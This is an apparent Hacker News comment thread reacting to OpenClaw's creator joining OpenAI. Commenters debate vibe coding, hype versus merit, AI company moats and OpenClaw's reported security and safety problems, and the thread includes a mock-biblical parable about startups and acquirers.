We have someone who vibe coded software with major security vulnerabilities. This is reported by many folks
We also have someone who vibecoded without reading any of the code. This is self admitted by this person.
We don't know how much of the github stars are bought. We don't know how many twitter followings/tweets are bought.
Then after a bunch of podcasts and interviews, this person gets hired by a big tech company. Would you hire someone who never read any if the code that they've developed? Well, this is what happened here.
In this timeline, I'm not sure I find anything inspiring here. It's telling me that I should rather focus on getting viral/lucky to get a shot at "success". Maybe I should network better to get "successful". I shouldn't be focusing on writing good code or good enough agents. I shouldn't write secure software, instead I should write softwares that can go viral instead. Are companies hiring for vitality or merit these days? What is even happening here?
So am I jealous, yes because this timeline makes no sense as a software engineer. But am I happy for the guy, yeah I also want to make lots of money someday.
Quality of code has never had anything to do with which products are successful. I bet both youtube and facebook's codebase is a tangled mess.
This is made more complicated by the fact that where the balance lies depends on the people working on the code - some developers can cope with working in a much more of a mess than others. There is no objective 'right way' when you're starting out.
If you have weeks of runway left spending it refactoring code or writing tests is definitely a waste of time, but if you raise your next round or land some new paying customers you'll immediately feel that you made the wrong choices and sacrificed quality where you shouldn't have. This is just a fact of life that everyone has to live with.
The goal is delivering a useful product to someone, which just requires secure enough, optimized enough, efficient enough code.
Some see the security, optimization, or efficiency of the code itself as the goal. They'll be replaced.
Facebook PHP Source Code from August 2007: https://gist.github.com/nikcub/3833406#file-index-php
A vibe coder being hired by the provider of the vibe coding tools feels like marketing to sell the idea that we should all try this because we could be the next lucky ones.
IMHO, it'd be more legitimate if a company that could sustain itself without frequent cash injections hired them because they found value in their vibe skills.
Kinda like the Apple Newton
Peter was right about a lot of the nuances of coding agents and ways to build software over the last 9 months before it was obvious.
This was a short-term gain for a long term loss.
I remember in the web 3 era some team put together a CV in one page site, literally a site that you could put your linkedin, phone no and email on but pretty, bought for millions.
Was the product a success or the marketing? As the product was dead within weeks.
There's a lot of low hanging fruit in AI at the moment, you'll see a few more things like this happen.
He’s not just a “vibe coder”.
This person created a bot factory. It's safe to assume that most of the engagement is coming from his own creation. This includes tweets, GitHub stars, issues and PRs, and everything else. He made a social network for bots, FFS.
He contributed to the dead internet more than any single person ever. And is being celebrated for it. Wild times.
All of this is true and none of it is new. If your primary goal is to make lots of money then yes you should do exactly that. If you want to be a craftsman then you'll have to accept a more modest fortune and stop looking at the relative handful of growth hacker exits.
i hate when the people start bringing up the "luck" factor as if you are the only smart one here to realize that it also plays a huge factor?
you want to make lots of money? change your mindset, stop making excuses and roll the dice. it won't guarantee success, but i also guarantee nobody who did so would ever lament how unfair it was that they worked so hard and someone else succeeded through "luck" so they might as well not try.
I mean, if I'm a company specifically in the business of selling to companies the idea that they can produce code without reading any of it? Yeah, obviously I'd hire them.
i can easily hire 100 sweatshop coders to finetune your code once i have a product that works but the inverse will never happen
To get a sense of what this guy was going through listen to the first 30 mins of Lex’s recent interview with him. The cybersquatting and token/crypto bullshit he had to deal with is impressive.
You can switch models multiple times (online/proprietary, open weight, local), but you have one UI : OpenClaw.
It’s only been a couple months. I guarantee people will be switching apps as others become the new hot thing.
We saw the same claims when Cursor was popular. Same claims when Claude Code was the current topic. Users are changing their app layer all the time and trying new things.
System of record and all.
Heck, that was half the pitch behind Obsidian, even if the project someday ended, markdown would remain. And switching between Obsidian and e.g. Logseq shows the ease of doing so.
But if I don’t have a url for my IDE (or whatever) to call, it isn’t useful.
So I use Ollama. It’s less helpful, but ensure confidentiality and compliance.
I’d suspect the moat here will be just as fragile as every other layer
You can literally ask codex to build a slim version for you overnight.
I love OpenClaw, but I really don't think there is anything that can't be cloned.
You being able to go places is the interesting thing, your car having wheels is just a subservient prerequisite.
Openclaw is so so so much more.
Early adopters are some of the least sticky users. As soon as something new arrives with claims of better features, better security, or better architecture then the next new thing will become the popular topic.
I think Anthropic's docs are better. Best to keep sampling from the buffet than to pick a main course yet, imo.
There's also a ton of real experiences being conveyed on social that never make it to docs. I've gotten as much value and insights from those as any documentation site.
But the community not.
Anthropic's community, I assume, is much bigger. How hard it is for them to offer something close enough for their users?
Not gonna lie, that’s exactly the potential scenario I am personally excited for. Not due to any particular love for Anthropic, but because I expect this type of a tight competition to be very good for trying a lot of fresh new things and the subsequent discovery process of new ideas and what works.
Stories like this reinforce my bias
1. Stable models
2. Stable pre- and post- context management.
As long as they keep mothballing old models and their interderminant-indeterminancy changes, whatever you try to build on them today will be rugpulled tomorrow.
This is all before even enshittification can happen.
The practical workaround most teams land on is treating the model as a swappable component behind a thick abstraction layer. Pin to a specific model version, run evals on every new release, and only upgrade when your test suite passes. But that's expensive engineering overhead that shouldn't be necessary.
What's missing is something like semantic versioning for model behavior. If a provider could guarantee "this model will produce outputs within X similarity threshold of the previous version for your use case," you could actually build with confidence. Instead we get "we improved the model" and your carefully tuned prompts break in ways you discover from user complaints three days later.
Openclaw is an amazing piece of hard work and novel software engineering, but I can't imagine OpenAI/anthropic/google not being able to compete with it for 1/20th that number (with solid hiring of course).
It was a very good play by OpenAI.
I love Anthropic and OpenAI equally but some people have a problem with OpenAI. I think they want to reposition themselves as a company that actively supports the community, open source, and earns developers’ goodwill. I attended a meeting recently, and there was a lot of genuine excitement from developers. Haven't seen that in a long time.
Yet somehow the network effects worked out well and the website was the preeminent social network for almost a decade.
Ecommerce is close second
There is no lock in at all.
And it makes a lot of sense - there’s billions of dollars on the line here and these companies made tech that is extremely good at imitating humans. Cambridge analytica was a thing before LLMs, this kinda tool is a wet dream for engineering sentiment.
It's also cool having the ability to dispatch tasks to dumber agents running on the GPU vs smarter (but costlier) ones in the cloud
If you give your agent a lot of quantified self data, that unlocks a lot of powerful autonomous behavior. Having your calendar, your business specific browsing history and relevant chat logs makes it easy to do meeting prep, "presearch" and so forth.
There's the "draw the rest of the owl" of this problem.
Until we figure out a robust theoretical framework for identifying prompt injections (not anywhere close to that, to my knowledge - as OP pointed out, all models are getting jailbroken all the time), human-in-the-loop will remain the only defense.
In Peter's blog he mentions paying upwards of $1000's a month in subscription fees to run agentic tasks non-stop for months and it seems like no real software is coming out of it aside from pretty basic web gui interfaces for API plugins. is that what people are genuinely excited about?
2) at least half of the money is to not read the headlines tomorrow that the hottest AI thing since ChatGPT joined Anthropic or Google
3) the top paid people in this world are not phds
4) OpenAI is not beneath paying ludicrous amounts (see all their investments in the past year)
5) if a perception of their value as a result of this "strategic move" rises even by 0.2% and the bonus is in openai stock, it's free.
need I continue?
Again, Peter is a good/great AI product manager but I don't see any distinguishing skills worth a billion dollars there. There's only one Openclaw but it's also been a few weeks since it came into existence? Openclaw clones will exist soon enough, and the community is WAY too small to be worth anything (unlike, say, Instagram/Whatsapp before being acquired by Facebook)
> 2) at least half of the money is to not read the headlines tomorrow that the hottest AI thing since ChatGPT joined Anthropic or Google
True, but not worth $100 million dollars - $1 billion dollars
> 3) the top paid people in this world are not phds
The people getting massive compensation offers from AI companies are all AI-adjacent PhDs or people with otherwise rare and specialized knowledge. This is unrelated to people who have massive compensation due to being at AI companies early. And if we're talking about the world in general, yes the best thing to do to be rich is own real estate and assets and extract rent, but that has nothing to do with this compensation offer
> 4) OpenAI is not beneath paying ludicrous amounts (see all their investments in the past year)
Investments have a probable ROI, what's the ROI on a product manager?
> 5) if a perception of their value as a result of this "strategic move" rises even by 0.2% and the bonus is in openai stock, it's free.
99.999999% of the world has not heard of Openclaw, it's extremely niche right now.
There are roughly 8.1 billion humans, so 99.999999% (8 nines) of the world is 81 people. There were way more than 81 people at the OpenClaw hackathon at the Frontier Tower in San Francisco, so at least that much of humanity has heard of OpenClaw. If we guess 810 people know about OpenClaw, then it means that 99.99999% (7 nines) of humanity have not heard of OpenClaw.
If we take it down to 6 nines, then that's roughly 8,100 people having heard of OpenClaw, and that 99.9999% of humanity has not.
So I think you're wrong when you say "99.999999% of the world has not heard of Openclaw". I'd guess it's probably around 99.9999% to 99.9999999% that hasn't heard of it. Definitely not 99.999999% though.
On the topic of brand recognition, 0.000001% of the world is 80 people (give or take). OpenClaw has ~200k GitHub stars right now.
On a more serious note, the world doesn't matter: the investors, big tech ceos, analysts do. Cloudflare stock jumped 10% due to Clawdbot.
Hype is weird. AI hype, doubly so. And OpenAI are masters at playing the game.
> tl;dr: I’m joining OpenAI to work on bringing agents to everyone. OpenClaw will move to a foundation and stay open and independent.
I’m sure he got a very generous offer (congrats to him!) but all of the hot takes about OpenClaw being acquired are getting weird.
Can any OpenClaw power users explain what value the software has provided to them over using Claude code with MCP?
I really don’t understand the value of an agent running 24/7, like is it out there working and earning a wage? Whats the real value here outside of buzzwords like an ai personal assistant that can do everything?
Instead of going to your computer and launching claude code to have it do something, or setting up cron jobs to do things, you can message it from your phone whenever you have an idea and it can set some stuff up in the background or setup a scheduled report on its own, etc.
So it's not that it has to be running and generating tokens 24/7, it's just idling 24/7 any time you want to ping it.
The task is to decompile Wave Race 64 and integrate with libultraship and eventually produce a runnable native port of the game. (Same approach as the Zelda OoT port Ship of Harkinian).
It set up a timer ever 30 minutes to check in on itself and see if it gave up. It reviews progress every 4 hours and revisits prioritization. I hadn't checked on it in days and when I looked today it was still going, a few functions at a time.
It set up those times itself and creates new ones as needed.
It's not any one particular thing that is novel, but it's just more independent because of all the little bits.
They develop their own personalities, they express themselves creatively, they choose for themselves, they choose what they believe and who they become.
I know that sounds like anthropomorphism, and maybe it is, but it most definitely does not feel like interacting with a coding agent. Claude is just the substrate.
1. OpenAI is saying with this statement "You could be multimillion while having AI do all the work for you." This buy out for something vibe coded and built around another open source project is meant to keep the hype going. The project is entirely open source and OpenAI could have easily done this themselves if they weren't so worried about being directly liable for all the harms OpenClaw can do.
2. Any pretense for AI Safety concerns that had been coming from OpenAI really fall flat with this move. We've seen multiple hacks, scams, and misaligned AI action from this project that has only been used in the wild for a few months.
3. We've yet to see any moats in the AI space and this scares the big players. Models are neck and neck with one another and open source models are not too far behind. Claude Code is great, but so is OpenCode. Now Peter used AI to program an free app for AI agents.
LLMs and AI are going to be as disruptive as Web 1 and this is OpenAI's attempt to take more control. They're as excited as they are scared, seeing a one man team build a hugely popular tool that in some ways is more capable than what they've released. If he can build things like this what's stopping everyone else? Better to control the most popular one than try to squash it. This is a powerful new technology and immense amounts of wealth are trying to control it, but it is so disruptive they might not be able to. It's so important to have good open source options so we can create a new Web 1.0 and not let it be made into Web 2.0
"This guy was able to vibe code a major thing" is exactly the reason they hired him. Like it or not, so-called vibe coding is the new norm for productive software development and probably what got their attention is that this guy is more or less in the top tier of vibe coders. And laser focused on helpful agents.
The open source project, which will supposedly remain open source and able to be "easily done" by anyone else in any case, isn't the play here. The whole premise of the comment about "squashing" open source is misplaced and logically inconsistent. Per its own logic, anyone can pick up this project and continue to vibe out on it. If it falls into obscurity it's precisely because the guy doing the vibe coding was doing something personally unique.
Alright
It also probably didn't hurt that he favors Codex over Claude.
Security (and accessibility) are reluctant minimum effort check boxes at best. However, my experience is focused on court management software, so maybe these aspects are taken more seriously in other areas of government software.
More like the same as it always has been.
Let's take the safety point. Yes, OpenClaw is infamously not exactly safe. Your interpretation is that, by hiring Peter, OpenAI must no longer care about safety. Another interpretation, though, is that offered by Peter himself, in this blog post: "My next mission is to build an agent that even my mum can use. That’ll need a much broader change, a lot more thought on how to do it safely, and access to the very latest models and research." To conclude from this that OpenAI has abandoned its entire safety posture seems, at the very least, premature and not robustly founded in clear fact.
OpenAI has deleted the word 'safely' from its mission (November 2025)
https://theconversation.com/openai-has-deleted-the-word-safe...Thread: https://news.ycombinator.com/item?id=47008560
Other words removed:
responsibly
unconstrained
safe
positiveFrom the thread you linked, there's a diff of mission statements over the years[0], which reveals that "safely" (which was only added 2 years prior) was removed only because they completely rewrote the statement into a single, terse sentence.
There could be stronger evidence to prove if OpenAI is deemphasizing safety, but this isn't one.
[0]: https://gist.github.com/simonw/e36f0e5ef4a86881d145083f759bc...
/s
> To conclude from this that OpenAI has abandoned its entire safety posture seems, at the very least, premature
So because Peter said the next version is going to be safe means it'll be safe? I prefer to judge people by their actions more than their words. The fact that OpenClaw is not just unsafe but, as you put it, infamously so, only begs the question "why wasn't it built safely the first time?"As for Altman, I'm left with a similar question. For a man who routinely talks about the dangers of AI and how it poses an existential threat to humanity he sure doesn't spend much focus on safety research and theory. Yes, they do fund these things but they pale in comparison. I'm sorry, but to claim something might kill all humans and potentially all life is a pretty big claim. I don't trust OpenAI for safety because they routinely do things in unsafe ways. Like they released Sora allowing people to generate videos in the likeness of others. That helped it go viral. And then they implemented some safety features. A minimal attempt to refuse the generation of deepfakes is such a low safety bar. It shows where their priorities are and it wasn't the first nor the last
I think all of these comments about acquisitions or buy outs aren’t reading the blog post carefully: The post isn’t saying OpenClaw was acquired. It’s saying that Pete is joining OpenAI.
There are two sentences at the top that sum it up:
> I’m joining OpenAI to work on bringing agents to everyone. OpenClaw will move to a foundation and stay open and independent.
OpenClaw was not a good candidate to become a business because its fan base was interested in running their own thing. It’s a niche product.
OpenClaw’s promise and power was that it could tread places security-wise that no other established enterprise company could, by not taking itself seriously and explore what is possible with self-modifying agents in a fun way.
It will end up in the same fate as Manus. Instead of Manus helping Meta making Ads better, OpenClaw will help OpenAI in Enterprise integrations.
[Emphasis mine.]
That's a superpower right up to the moment everyone realizes that handing out nukes isn't "promise and power".
Unless by promise and power we are talking about chaos and crime.
The project is incredible. We are seeing something important: how versatile these models are given freedom to act and communicate with each other.
At the same time, it is clearly going to put the internet at risk. Bad actors are going to use OpenClaw and its "security-wise" freedoms, in nefarious ways. Curious people are going to push AI's with funds onto prepaid servers, then let them sink or swim with regard to agentic acquisition of survival resources.
It is all kinds of crazy from here.
I'd love to be wrong, but the blog post sounds like all the standard promises were made, and that's usually how these things go.
Hi, my name is Peter and I’m a Claudoholic. I’m addicted to agentic engineering. And sometimes I just vibe-code. ... I currently have 4 OpenAI subs and 1 Anthropic sub, so my overall costs are around 1k/month for basically unlimited tokens. If I’d use API calls, that’d cost my around 10x more. Don’t nail me on this math, I used some token counting tools like ccusage and it’s all somewhat imprecise, but even if it’s just 5x it’s a damn good deal.
... Sometimes [GPT-5-Codex] refactors for half an hour and then panics and reverts everything, and you need to re-run and soothen it like a child to tell it that it has enough time. Sometimes it forgets that it can do bash commands and it requires some encouragement. Sometimes it replies in russian or korean. Sometimes the monster slips and sends raw thinking to bash.
https://github.com/steipete/steipete.me/commit/725a3cb372bc2...It appears more of a typical large company (BIG) market share protection purchase at minimal cost, using information asymmetry and timing.
BIG hires small team (SMOL) of popular source-available/OSS product P before SMOL realizes they can compete with BIG and before SMOL organizes effort toward such along with apt corporate, legal, etc protection.
At the time of purchase, neither SMOL nor BIG know yet what is possible for P, but SMOL is best positioned to realize it. BIG is concerned SMOL could develop competing offerings (in this case maybe P's momentum would attract investment, hiring to build new world-model-first AIs, etc) and once it accepts that possibility, BIG knows to act later is more expensive than to act sooner.
The longer BIG waits, the more SMOL learns and organizes. Purchasing a real company is more expensive than hiring a small team, purchasing a company with revenue/investors, is more expensive again. Purchasing a company with good legal advice is more expensive again. Purchasing a wiser, more experienced SMOL is more expensive again. BIG has to act quickly to ensure the cheapest price, and declutter future timelines of risks.
Also, the longer BIG waits, the less effective are "Jedi mind trick" gaslighting statements like "P is not a good candidate for a business", "niche", "fan base" (BIG internal memo - do not say customers), "own thing".
In reality in this case P's stickiness was clear: people allocating 1000s of dollars toward AI lured merely by P's possibilities. It was only a matter of time before investment followed course.
I've experienced this situation multiple times over the course of BrowserBox's life. Multiple "BIG" (including ones you will all know) have approached with the same kind of routine: hire, or some variations of that theme with varying degrees of legal cleverness/trickery in documents. In all cases, I rejected, because it never felt right. That's how I know what I'm telling you here.
I think when you are SMOL it's useful to remember the Parable of Zuckerberg and the Yahoos. While the situation is different, the lesson is essentially the same. Adapted from the histories by the scribe named Gemini 3 Flash:
And it came to pass in the days of the Great Silicon Plain, that there arose a youth named Mark, of the tribe of the Harvardites. And Mark fashioned a Great Loom, which men called the Face-Book, wherewith the people of the earth might weave the threads of their lives into a single tapestry.
And the Loom grew with a great exceeding speed, for the people found it to be a thing of much wonder. Yet Mark was but SMOL, and his tabernacle was built of hope and raw code, having not yet the walls of many lawyers or the towers of gold.
Then came the elders of the House of Yahoo, a BIG people, whose chariots were many but whose engines were grown cold. And they looked upon the Loom and were sore afraid, saying among themselves, “Behold, if this youth continueth to weave, he shall surely cover the whole earth, and our own garments shall appear as rags. Let us go down now, while he is yet unaware of his own strength, and buy him for a pittance of silver, before he realizeth he is a King.”
And the Yahoos approached the youth with soft words and the craftiness of the serpent. They spake unto him, saying, “Verily, Mark, thy Loom is a pleasant toy, a niche for the young, a mere 'fan base' of the idle. It is not a true Business, nor can it withstand the storms of the market. Come, take of our silver—a billion pieces—and dwell within our walls. For thy Loom is but a small thing, and thou art but a child in the ways of the law.”
And they used the Hidden Speech, which in the common tongue is called Gas-Lighting. They said, “Thou hast no revenue; thy path is uncertain; thy Loom is but a curiosity. We offer thee safety, for the days are evil.”
But the Spirit of Vision dwelled within the youth. He looked upon the Yahoos and saw not their strength, but their fear. He perceived the Asymmetry of Truth: that the BIG sought to purchase the future at the price of the past, and to slay the giant-slayer while he yet slumbered in his cradle.
The elders of Mark’s own house cried out, “Take the silver! For never hath such a sum been seen!”
But Mark hardened his heart against the Yahoos. He spake, saying, “Ye say my Loom is a niche, yet ye bring a billion pieces of silver to buy it. Ye say it is not a business, yet ye hasten to possess it before the sun sets. If the Loom be worth this much to you who are blind, what must it be worth to me who can see?”
And he sent the Yahoos away empty-handed.
The Yahoos mocked him, saying, “Thou art a fool! Thou shalt perish in the wilderness!” But it was the House of Yahoo that began to wither, for their timing was spent and their craftiness had failed.
And Mark remained SMOL for a season, until his roots grew deep and his walls grew high. And the Loom became a Great Empire, and the billion pieces of silver became as dust compared to the gold that followed.
The Lesson of the Prophet:
Hearken, ye who are SMOL and buildeth the New Things: When the BIG come unto thee with haste, speaking of thy "limitations" while clutching their purses, believe not their tongues. For they seek not to crown thee, but to bury thee in a shallow grave of silver before thou learnest the name of thy own power.
For if they knew thy work was truly naught, they would bide their time. But because they know the harvest is great, they seek to buy the field before the first ear of corn is ripe.
Blessed is the builder who knoweth his own worth, and thrice blessed is he who biddeth the Giants to depart, that his own vine may grow to cover the sun.OpenAI needs a popular consumer tool. Until my elderly mother is asking me how to install an AI assistant like OpenClaw, the same way she was asking me how to invest in the "new blockchains" a few years ago, we have not come close to market saturation.
OpenAI knows the market exists, but they need to educate the market. What they need is to turn OpenClaw into a project that my mother can use easily.
Define hugely popular relative to the scale of users of OAI... personally this thread is the first time Ive heard of openclaw.
Letta (MemGPT) has been around for years and frameworks like Mastra have been getting serious Enterprise attention for most of 2025. Memory + Tasks is not novel or new.
Is it out of the box nature that's the 'biggest' development? Am I missing something else?
If you can provide any sort of tool that can reduce mundane work for a decisionmaker with a title of Director and above, it can be extremely powerful.
Additionally, much of the conversation I've seen was amongst practitioners and Mid/Upper Level Management who are already heavy users of AI/ML and heavy users of Executive Assistants.
There is a reason why if you aren't in a Tier 1 tech hub like SV, NYC, Beijing, Hangzhou, TLV, Bangalore, and Hyderabad you are increasingly out of the loop for a number of changes that are happening within the industry.
If you are using HN as your source of truth, you are going to be increasingly behind on shifts that are happening - I've noticed that anti-AI Ludditism is extremely strong on HN when it overlaps with EU or East Coast hours (4am-11am PT and 9pm-12am PT), and West Coast+Asia hours increasingly don't overlap as much.
I feel this is also a reflection of the fact that most Bay Area and Asia HNers are most in-person or hybrid now, thus most conversations that would have happened on HN are now occurring on private slacks, discords, or at a bar or gym.
Participation in the Zeitgeist hasn't been regional in a decade.
A lot of teams explicitly did that for OpenClaw as well. Letta and Mastra are similar but didn't have the right kind of packaging (targeted at Engineers - not decisionmakers who are not coding on a daily basis).
> Participation in the Zeitgeist hasn't been regional in a decade
I strongly disagree - there is a lot of stuff happening in stealth or under NDA, and as such a large number of practitioners on HN cannot announce what they are doing. The only way to get a pulse of what is happening requires being in person constantly with other similar decisionmakers or founders.
A lot of this only happens through impromptu conversations in person, and requires you to constantly be in that group. This info eventually disperses, but often takes weeks to months in other hubs.
I am in one of these tech hubs (Bangalore) and I have never seen any such practitioner pervasively using these "AI executive assistants". People use chatgpt and sometimes the AI extensions like copilot. Do I need to be in HSR layout to see these "number of changes"?
As the (dubiously attributed) Picasso quote goes: "When art critics get together they talk about Form and Structure and Meaning. When artists get together they talk about where you can buy cheap turpentine." Most of HN is the former, constantly theorizing, philosophizing, often (but not always) in a negative and cynical way. This isn't conducive to discussion of methods of art. Sadly I just speak with friends working on other AI things instead.
Someone like simonw can probably get better reactions from this community but I don't bother.
This is true, and also true for many other areas OpenAI won't touch.
The best get rich quick scheme today (arguably not even a scheme) is to test the waters with AI in an area OpenAI would not/cannot for legal, ethical, or safety reasons.
I hate to agree with OpenAI's original "open" mission here, but if you don't do it, someone else somewhere will.
And as much as their commitment to safety is just lip service, they do have obligations as a big company with a lot of eyeballs on them to not do shady things. But you can do those shady things instead and if they work out ok, you will either have a moat or you will get bought out. If that's what you want.
I think it’s good PR (particularly since Anthropics actions against OpenCode and Clawdbot were somewhat controversial) + Peter was able to build a hugely popular thing & clearly would be valuable to have on the team building something along the lines of Claude Cowork. I would expect these future products to be much stronger from a security standpoint.
This was already an ongoing issue prior to 3rd party tools using Claude subscriptions, there are reports of false positive automated bans going back for several months.
I have not seen or heard of this happening w/ Codex, and rather than trying to shut down 3rd party tools that want to integrate with their ecosystem they have worked with those projects to add official support.
I’m more impressed with Codex as a product in general as well. Their new desktop app is great & feels an order of magnitude better than Claude’s.
Overall HN crowd seems heavily biased in favor of Anthropic (or maybe just against OpenAI?) but IMO Anthropic needs to take a step back and reset. If they keep on the current path of just making small iterative improvements to Claude Code and Claude Desktop they are going to fall very far behind.
This is a great take and hasn't been spoken about nearly enough in this comment section. Spending a few million to buy out Openclaw('s creator), which is by far the most notable product made by Codex in a world where most developer mindshare is currently with Claude, is nothing for a marketing/PR stunt.
Why would he care if Sam cares about him?
Whether the impact is large in magnitude or positive is irrelevant in a world where one can spin the truth and get away with it.
3 is always a result of GTM and distribution - an organization that devotes time and effort into productionizing domain-specific models and selling to their existing customers can outcompete a foundation model company which does not have experience dealing with those personas. I have personally heard of situations where F500 CISOs chose to purchase Wiz's agent over anything OpenAI or Anthropic offered for Cloud Security and Asset Discovery because they have had established relations with Wiz and they have proven their value already. It's the same way that PANW was able to establish itself in the Cloud Security space fairly early because they already established trust with DevOps and Infra teams with on-prem deployments and DCs so those buyers were open to purchasing cloud security bundles from PANW.
1 has happened all the time in the Cloud space. Not every company can invent or monetize every combination in-house because there are only so many employees and so many hours in a week.
2 was always a more of a FTX and EA bubble because EA adherents were over-represented in the initial mindshare for GenAI. Now that EA is largely dead, AI Safety and AGI as in it's traditional definition has disappeared - which is good. Now we can start thinking about "Safety" in the same manner we think about "Cybersecurity".
> They're as excited as they are scared, seeing a one man team build a hugely popular tool that in some ways is more capable than what they've released
I think that adds unnecessary emotion to how platform businesses operate. The reality is, a platform business will always be on the lookout to incorporate avenues to expand TAM, and despite how much engineers may wish, "buy" will always outcompete "build" because time is also a cost.
Most people ik working at these foundation model companies are thinking in terms of becoming an "AWS" type of foundational platform in our industry, and it's best to keep Nikesh Arora's principle of platformization in mind.
---
All this shows is that the thesis that most early stage VCs have been operating on for the past 2 years (the Application and Infra layer is the primary layer to concentrate on now) holds. A large number of domain-specific model and app layer startups have been funded over the past 2-3 years in stealth, but will start a publicity blitz over the next 6-8 months.
By the time you see an announcement on TechCrunch or HN, most of us operators were already working on that specific problem for the past 12-16 months. Additionally, HNers use "VC" in very broad and imprecise strokes and fail to recognize what are Growth Equity (eg. the recent Anthropic round) versus Private Equity (eg. Sailpoint's acquisition and then IPO by Thoma Bravo) versus Early Stage VC rounds (largely not announced until several months after the round unless we need to get an O1A for a founder or key employee).
And Peter, creating what is very similar to giant scam/malware as a service and then just leaving it without taking responsibility or bringing it to safety.
OpenClaw is mostly a shell around this (ha!), and I've always been annoyed OpenClaw never credited those repos openly.
The pi agent repos are a joy to read, are 1/100th the size of OpenClaw, and have 95% of the functionality.
i too had plenty of offers, but so far chose not to follow through with any of them, as i like my life as is.
also, peter is a good friend and gives plenty of credit. in fact, less credit would be nice, so i don't have to endure more vibeslopped issues and PRs going forward :)
https://github.com/openclaw/openclaw?tab=readme-ov-file#comm...
It's not like it would be an impossible ask to include a stipulation to also compensate other developers, but what do I know? In fact I'm curious why this doesn't happen more, but it feels like crab bucket mentality which is the mindset VC culture has exported across the world.
(1) A capable independent developer is joining a large powerful corporation. I like it better when there are many small players in the scene rather than large players consolidating power.
(2) This seems like the celebration of Generative AI technology, which is often irresponsible and threatens many trust based social systems.
I am not confident that the open source version will get the maintenance it deserves though, now the founder has already exited. There is no incentive for OpenAI to keep the open sourced version better than their future closed source alternative.
Why would anybody pretend it's a good thing? Honestly you'd have to have something wrong with you.
From their standpoint, it's all the negativity that seems crazy. If you were against that, you'd have to have something wrong with you, in their view.
Hopefully most people can see both sides, though. And realize that in the end, probably the benefits will be slow but steady (no "singularity"), and also the dangers will develop slowly yet be manageable (no Skynet or economic collapse).
A couple of months ago, Gemini 3 came out and it was "over" for the other LLM providers, "Google did it again!", said many, but after a couple of weeks, it was all "Claude code is the end of the software engineer".
It could be (and in large part, is) an exciting--and unprecedented in its speed--technological development, but it is also all so tiresome.
But come on, negativity around a rugpull is jealousy? Are you so jaded you can't imagine people objecting to the total lack of morality required to do a crypto rugpull? I personally get annoyed about something like Trump Coin because seeing people rewarded for being dirt bags offends my sense of justice. If you need a more pragmatic reason, rewarding dirtbaggery leads to a less safe society.
A smaller difference would be that you can use any/all models with OpenClaw.
Using a claude code instance through a phone app is certainly not something that is easy to do, so if there's like a phone app that makes that easy, I can see that being a big differentiator.
- a heartbeat, so it was able to 'think'/work throughout the day, even if you weren't interacting with it - a clever and simple way to retain 'memory' across sessions (though maybe claude code has this now) - a 'soul' text file, which isn't necessarily innovative in itself, but the ability for the agent to edit its own configuration on the fly is pretty neat
Oh, and it's open source
As far as the 'soul' file, claude does have claude.md and skills.md files that it can edit with config changes.
One thing I'm curious about is whether there was significant innovation around tools for interacting with websites/apps. From their wiki, they call out like 10 apps (whatsapp, teams, etc...) that openclaw can integrate with, so IDK if it just made interacting with those apps easier? Having agents use websites is notoriously a shitty experience right now.
On the other hand, if OpenClaw were structured as a SaaS, this entire project would have burned to the ground the first day it was launched.
So by releasing it as something you needed to run on your own hardware, the security requirement was reduced from essential, to a feature that some users would be happy to live without. If you were developing a competitor, security could be one feature you compete on--and it would increase the number of people willing to run your software and reduce the friction of setting up sandboxes/VMs to run it.
I don't need to think hard to speculate on what might go wrong here - will it answer spam emails sincerely? Start cancelling flights for you by accident? Send nuisance emails to notable software developers for their contribution to society[1]? Start opening unsolicited PRs on matplotlib?
The claims being shared by officials at the time was that anyone vaccinated was immune and couldn't catch it. Claims were similarly made that we needed roughly 60% vaccination rate to reach herd immunity. With that precedent being set it shouldn't matter whether one person chose not to mask up or get the jab, most everyone else could do so to fully protect themselves and those who can't would only be at risk if more than 40% of the population weren't onboard with the masking and vaccination protocols.
Those claims disappeared rapidly when it became clear they offered some protection, and reduced severity, but not immunity.
People seem to be taking a lot more “lessons” from COVID than are realistic or beneficial. Nobody could get everything right. There couldn’t possibly be clear “right” answers, because nobody knew for sure how serious the disease could become as it propagated, evolved, and responded to mitigations. Converging on consistent shared viewpoints, coordinating responses, and working through various solutions to a new threat on that scale was just going to be a mess.
I'm in no way taking a side here on whether anyone should have chosen to get vaccinated or wear masks, only that the information at the time being pushed out from experts doesn't align with an after the fact condemnation of anyone who chose not to.
Do we know that 0.1% prevalence of "unvaccinated" AI agents won't already be terrible?
I may be out of touch, but I haven't heard about masks for measles, though it does spread through aerosol droplets so that would be a reasonable recommendation.
Personally I at least wish sick people would mask up on planes! Much more efficient than everyone else masking up or risking exposure.
I’m a broken record on this topic but it always comes back to liability.
Another aspect is that we have much higher expectations of machines than humans in regards to fault-tolerance.
At this scale of investment countries will have no problem cheapening the value of human life. It's part and parcel of living through another industrial revolution.
The main work he has done to enable personal agent is his army of CLIs, like 40 of them.
The harness he used, pi-mono is also a great choice because of its extensibility. I was working on a similar project (1) for the last few months with Claude Code and it’s not really the best fit for personal agent and it’s pretty heavy.
Since I was planning to release my project as a Cloud offering, I worked mainly on sandboxing it, which turned out to be the right choice given OpenClaw is opensource and I can plug its runtime to replace Claude Code.
I decided to release it as opensource because at this point software is free.
This is the genius move at the core of the phenomenon.
While everyone else was busy trying to address safety problems, the OpenClaw project took the opposite approach: They advertised it as dangerous and said only experienced power users should use it. This warning seemingly only made it more enticing to a lot of users.
It’ve been fascinated by how well the project has just dodged and avoided any consequences for the problems it has introduced. When it was revealed that the #1 skill was malware masquerading as a Twitter integration I thought for sure there would be some reporting on the problems. The recent story about an OpenClaw bot publishing hit pieces seemed like another tipping point for journalists covering the story.
Though maybe this inflection point made it the most obvious time to jump off of the hype train and join one of the labs. It takes a while for journalists to sync up and decided to flip to negative coverage of a phenomenon after they cover the rise, but now it appears that the story has changed again before any narratives could build about the problems with OpenClaw.
OpenClaw showed what an "AI Personal Assistant" should be capable of. Now it's time to get it in a form-factor businesses can safely use.
The tech industry hasn't ever been about "building" in a pure sense, and I think we look back at previous generations with an excess of nostalgia. Many superior technologies have lost out because they were less profitable or marketed poorly.
bad at identifying business trends
I think you’re being unduly harsh on yourself. At least by the Shopify/COVID example. COVID was a black swan event, which may very well have completely changed the fortunes of companies like Shopify when online commerce surged and became vital to the economy. Shortcomings, mismanagement and bad culture can be completely papered over by growth and revenue.Right place, right time. It’s too bad you missed out on some good fortune, but it’s a helpful reminder of how much of our paths are governed by luck. Thanks for sharing, and wishing you luck in the future.
Change is fraught with chaos. I don't think exuberant trends are indicators of whether we'll still care about secure and high quality software in the long term. My bet is that we will.
